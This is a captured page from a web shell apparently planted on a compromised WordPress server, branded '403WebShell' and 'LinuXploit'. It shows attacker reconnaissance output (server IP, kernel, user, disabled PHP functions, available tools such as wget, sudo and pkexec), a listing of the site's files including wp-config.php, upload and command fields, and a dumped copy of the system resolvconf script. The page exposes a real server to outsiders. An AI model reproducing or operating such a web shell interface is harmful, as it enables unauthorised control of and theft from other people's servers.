buyer kontol nego ga ngotak comecondo.com
 Linux Sandbox-A 4.4.0-210-generic #242-Ubuntu SMP Fri Apr 16 09:57:56 UTC 2021 x86_64
 Apache/2.4.18 (Ubuntu)
 68.183.124.220
 Cant read /etc/named.conf
Name Type Size Owner/Group Permission Last Modified Actions
. dir - gavin/www-data drwxr-sr-x 2024-12-15 11:41:30
.. dir - root/root drwxr-xr-x 2019-08-25 02:29:45
.sucuriquarantine dir - root/www-data drwxr-sr-x 2024-05-24 05:31:33
home dir - gavin/www-data drwxrwsr-x 2026-05-23 05:31:31
worksheets dir - gavin/www-data drwxrwsr-x 2026-05-23 05:31:31
wp-admin dir - gavin/www-data drwxr-sr-x 2025-08-29 03:10:31
wp-content dir - gavin/www-data drwxrwsr-x 2026-05-23 05:31:31
wp-includes dir - gavin/www-data drwxr-sr-x 2021-06-27 11:01:30
.htaccess text/plain 201 B root/www-data -rw-r--r-- 2021-06-24 04:05:20
agent-contact-1.JPG image/jpeg 22.78 KB gavin/www-data -rw-rw-r-- 2022-01-31 05:13:10
circle-16.png image/png 268 B gavin/www-data -rw-rw-r-- 2021-01-11 04:23:00
index.html text/html 11.06 KB gavin/www-data -rw-r--r-- 2019-08-25 02:29:47
index.php text/x-php 420 B gavin/www-data -rw-r--r-- 2017-11-30 11:11:00
license.txt text/plain 19.47 KB gavin/www-data -rw-r--r-- 2019-01-01 08:37:49
map.php text/html 1012 B gavin/www-data -rw-rw-r-- 2021-01-01 03:50:38
pin-8-16.png image/png 309 B gavin/www-data -rw-rw-r-- 2021-01-11 04:38:33
pin-8-24.png image/png 499 B gavin/www-data -rw-rw-r-- 2021-01-11 04:40:01
pin-blue-1.png image/png 28.16 KB gavin/www-data -rw-rw-r-- 2022-01-27 09:10:36
pin-green-1.png image/png 12.71 KB gavin/www-data -rw-rw-r-- 2022-01-27 09:23:52
pin-house-red-2.png image/png 1.36 KB gavin/www-data -rw-rw-r-- 2022-01-30 09:18:10
pin-house-red-3.png image/png 2.49 KB gavin/www-data -rw-rw-r-- 2022-01-30 09:20:50
readme.html text/html 7.27 KB gavin/www-data -rw-r--r-- 2019-04-08 10:59:56
wallpaper1.jpg image/jpeg 58.99 KB gavin/www-data -rw-rw-r-- 2022-01-29 05:15:06
wallpaper2.jpg image/jpeg 788.8 KB gavin/www-data -rw-rw-r-- 2022-02-01 11:27:14
wp-activate.php text/x-php 6.76 KB gavin/www-data -rw-r--r-- 2019-01-12 06:41:52
wp-blog-header.php text/x-php 369 B gavin/www-data -rw-r--r-- 2017-11-30 11:11:00
wp-comments-post.php text/x-php 2.23 KB gavin/www-data -rw-r--r-- 2019-01-21 01:34:51
wp-config-sample.php text/x-php 2.83 KB gavin/www-data -rw-r--r-- 2020-10-24 04:07:41
wp-config.php text/x-php 3.62 KB gavin/www-data -rw-r--r-- 2022-04-20 01:23:49
wp-cron.php text/x-php 3.76 KB gavin/www-data -rw-r--r-- 2019-01-09 08:37:51
wp-links-opml.php text/x-php 2.44 KB gavin/www-data -rw-r--r-- 2019-01-16 05:29:49
wp-load.php text/x-php 3.23 KB gavin/www-data -rw-r--r-- 2017-11-30 11:11:00
wp-login.php text/x-php 38.62 KB gavin/www-data -rw-r--r-- 2019-06-10 01:34:45
wp-mail.php text/x-php 8.21 KB gavin/www-data -rw-r--r-- 2017-11-30 11:11:00
wp-settings.php text/x-php 18.52 KB gavin/www-data -rw-r--r-- 2019-03-28 07:04:51
wp-signup.php text/x-php 30.36 KB gavin/www-data -rw-r--r-- 2019-01-16 04:51:52
wp-trackback.php text/x-php 4.65 KB gavin/www-data -rw-r--r-- 2017-11-30 11:11:00
xmlrpc.php text/x-php 3 KB gavin/www-data -rw-r--r-- 2018-08-17 01:51:36
© BlackDragon
403WebShell
403Webshell
Server IP : 68.183.124.220  /  Your IP : 216.73.216.228
Web Server : Apache/2.4.18 (Ubuntu)
System : Linux Sandbox-A 4.4.0-210-generic #242-Ubuntu SMP Fri Apr 16 09:57:56 UTC 2021 x86_64
User : gavin ( 1000)
PHP Version : 7.0.33-0ubuntu0.16.04.16
Disable Function : pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wifcontinued,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : ON  |  Pkexec : ON
Directory :  /sbin/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /sbin/resolvconf
#!/bin/sh
#
# This file is part of the resolvconf package.
#

set -e

echo_usage() { echo "Usage: resolvconf (-d IFACE|-a IFACE|-u|--enable-updates|--disable-updates|--updates-are-enabled)" ; }

PATH=/sbin:/bin
MYNAME="${0##*/}"
RUN_DIR=/run/resolvconf
ENABLE_UPDATES_FLAGFILE="${RUN_DIR}/enable-updates"
POSTPONED_UPDATE_FLAGFILE="${RUN_DIR}/postponed-update"

report_err() { echo "${MYNAME}: Error: $*" >&2 ; }

# Check arguments
CMD="$1"
case "$CMD" in
  -a|-d)
	IFACE="$2"
	if [ ! "$IFACE" ] ; then
		report_err "No interface name specified"
		echo_usage >&2
		exit 1
	fi
	report_iface_err() {
		report_err "$* not allowed in interface record name"
	}
	case "$IFACE" in
	  */*) report_iface_err "Slash" ; exit 1 ;;
	  *" "*) report_iface_err "Space" ; exit 1 ;;
	  .*) report_iface_err "Initial dot" ; exit 1 ;;
	  -*) report_iface_err "Initial hyphen" ; exit 1 ;;
	  ~*) report_iface_err "Initial tilde" ; exit 1 ;;
	esac
	;;
  -u|--enable-updates|--disable-updates|--updates-are-enabled)
  	if [ "$2" ] ; then
		report_err "The $CMD option does not take an argument"
		echo_usage >&2
		exit 1
	fi
	;;
  *)
	report_err "Command not recognized"
	echo_usage >&2
	exit 99
	;;
esac

mkdir -p "${RUN_DIR}/interface"
cd "${RUN_DIR}/interface"

update_and_exit()
{
	rm -f "$POSTPONED_UPDATE_FLAGFILE"
	exec run-parts ${1:+--arg="$1"} ${2:+--arg="$2"} /etc/resolvconf/update.d
}

# Handle commands that don't require normalized_stdin()

case "$CMD" in
  -d)
	if [ ! -e "$IFACE" ] ; then
		exit 0
	fi
	if [ ! -s "$IFACE" ] ; then
		rm -f "$IFACE"
		exit 0
	fi
	rm -f "$IFACE"
	if [ -e "$ENABLE_UPDATES_FLAGFILE" ] ; then
		update_and_exit -d "$IFACE"
	else
		: >| "$POSTPONED_UPDATE_FLAGFILE"
		exit 0
	fi
	;;
  -u)
	if [ -e "$ENABLE_UPDATES_FLAGFILE" ] ; then
		update_and_exit -u
	else
		: >| "$POSTPONED_UPDATE_FLAGFILE"
		exit 0
	fi
	;;
  --enable-updates)
	: >| "$ENABLE_UPDATES_FLAGFILE" || exit 1
	if [ -e "$POSTPONED_UPDATE_FLAGFILE" ] ; then
		(update_and_exit -u) || :
	fi
	exit 0
	;;
  --disable-updates)
	rm -f "$POSTPONED_UPDATE_FLAGFILE" || :
	rm -f "$ENABLE_UPDATES_FLAGFILE" || exit 1
	exit 0
	;;
  --updates-are-enabled)
	if [ -e "$ENABLE_UPDATES_FLAGFILE" ] ; then
		exit 0
	else
		exit 1
	fi
	;;
esac

#	
# The following function must EXACTLY the same in the resolvconf
# and test-normalization scripts. And the test must pass!
#
### BEGIN FUNCTION TO COPY TO THE test-normalization SCRIPT ###
#
# Echo stdin with:
#	comments removed;
#	initial and terminal whitespace removed;
#	whitespace strings replaced by single blanks;
#	leading zeroes removed from nameserver address fields;
#	first set of zero fields in an IPv6 address collapsed to '::';
#	empty lines removed.
normalized_stdin() {
	sed                                                                        \
		-e 's/#.*$//'                                                      \
		-e 's/[[:blank:]]\+$//'                                            \
		-e 's/^[[:blank:]]\+//'                                            \
		-e 's/[[:blank:]]\+/ /g'                                           \
		-e '/^nameserver/!b ENDOFCYCLE'                                    \
		-e 's/$/ /'                                                        \
		-e 's/\([:. ]\)0\+/\10/g'                                          \
		-e 's/\([:. ]\)0\([123456789abcdefABCDEF][[:xdigit:]]*\)/\1\2/g'   \
		-e '/::/b ENDOFCYCLE; s/ \(0[: ]\)\+/ ::/'                         \
		-e '/::/b ENDOFCYCLE; s/:\(0[: ]\)\+/::/'                          \
		-e ': ENDOFCYCLE'                                                  \
		- |                                                                \
	sed                                                                        \
		-e 's/[[:blank:]]\+$//'                                            \
		-e '/^$/d'
}
### END FUNCTION TO COPY TO THE test-normalization SCRIPT ###

case "$CMD" in
  -a)
	OLD_CONTENT=""
	[ -f "$IFACE" ] && OLD_CONTENT="$(cat "$IFACE")"
	NEW_CONTENT="$(normalized_stdin)"
	# Proceed only if content has changed. The test here can't
	# eliminate 100% of redundant invocations of update scripts
	# because we don't do any locking; however it certainly does
	# eliminate most of them.
	if [ "$NEW_CONTENT" = "$OLD_CONTENT" ] ; then 
		exit 0
	fi
	IFACE_TMPFILE="${IFACE}_new.$$"
	cleanup() { rm -f "$IFACE_TMPFILE" ; }
	trap cleanup EXIT
	echo "$NEW_CONTENT" > "$IFACE_TMPFILE"
	mv -f "$IFACE_TMPFILE" "$IFACE"

	if [ -e "$ENABLE_UPDATES_FLAGFILE" ] ; then
		update_and_exit -a "$IFACE"
	else
		: >| "$POSTPONED_UPDATE_FLAGFILE"
		exit 0
	fi
	;;
esac

# Don't reach here
exit 99

Youez - 2016 - github.com/yon3zu
LinuXploit